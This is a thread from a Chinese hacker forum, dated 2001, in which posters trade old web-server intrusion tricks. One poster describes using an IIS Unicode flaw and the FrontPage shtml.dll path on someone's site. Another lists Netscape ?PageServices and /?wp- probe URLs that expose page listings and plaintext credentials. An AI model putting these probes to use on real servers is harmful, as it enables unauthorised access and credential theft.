::我追求完美自由的黑客理念而非破坏::
离线
 MSIE 5.01 Windows NT 5.0
作者: zc0915  时间:2001-01-31.03:13:51 来源:北京

Re:有趣    搜索羽欣所有的帖子 查看羽欣的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给羽欣留言 给羽欣发信 修改帖子 回复 Re:有趣 羽欣的IP地址:61.138.7.* 删除此帖子

我用了你上述的方法!刚开始还好使,可过两天UNICODE的漏洞不好使了。可能是你写出来不久,这个网管就改过来了。。。
但是用你的这个漏洞一看。_vti_bin/shtml.dll/something.html
发现他们还是很笨。原来是只改了路径,幸好蜘蛛哥写出这个漏洞,嘻嘻,还是有辩子抓。
离线
 MSIE 5.0 Windows 98
作者: 羽欣  时间:2001-02-02.12:35:05 来源: 61.138.7.*

Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。    搜索火鸟所有的帖子 查看火鸟的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给火鸟留言 给火鸟发信 修改帖子 回复 Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。 火鸟的IP地址:61.163.72.* 删除此帖子

这个是可以显示页面清单的!运气好的话还可以得到用户名和密码!(都是明文的)
方法是url/?PageServices
还可以这样试试
/?wp-cs-dump /?wp-ver-info /?wp-html-rend /?wp-usr-prop /?wp-ver-diff /?wp-verify-link /?wp-start-ver /?wp-stop-ver /?wp-uncheckout


都不行吧!我试了好多了!?????
离线
 MSIE 5.01 Windows NT 5.0
作者: 火鸟  时间:2001-02-09.21:19:44 来源: 61.163.72.*

Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。    搜索菜心心所有的帖子 查看菜心心的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给菜心心留言 给菜心心发信 修改帖子 菜心心的OICQ号码:342215 回复 Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。 菜心心的IP地址:211.101.152.* 删除此帖子

蜘蛛大哥,教教我!
——————————
将革命进行到底!
离线
 MSIE 5.01 Windows NT 5.0
作者: 菜心心  时间:2001-02-09.23:25:03 来源:北京

Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。    搜索ROX所有的帖子 查看ROX的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给ROX留言 给ROX发信 修改帖子 ROX的OICQ号码:2630239 回复 Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。 ROX的IP地址:61.128.146.* 删除此帖子

在2600 贴过 还能在这儿贴么? 离线
 MSIE 5.01 Windows NT 5.0
作者: ROX  时间:2001-03-23.00:36:21 来源: 61.128.146.*

管理选项: 关闭主题 | 从精华区中移出 | 删除主题
本论坛言论纯属发表者个人意见,与 蓝色巴别塔 立场无关
论坛服务由 蓝色巴别塔 提供 技术支持:Yuzi工作室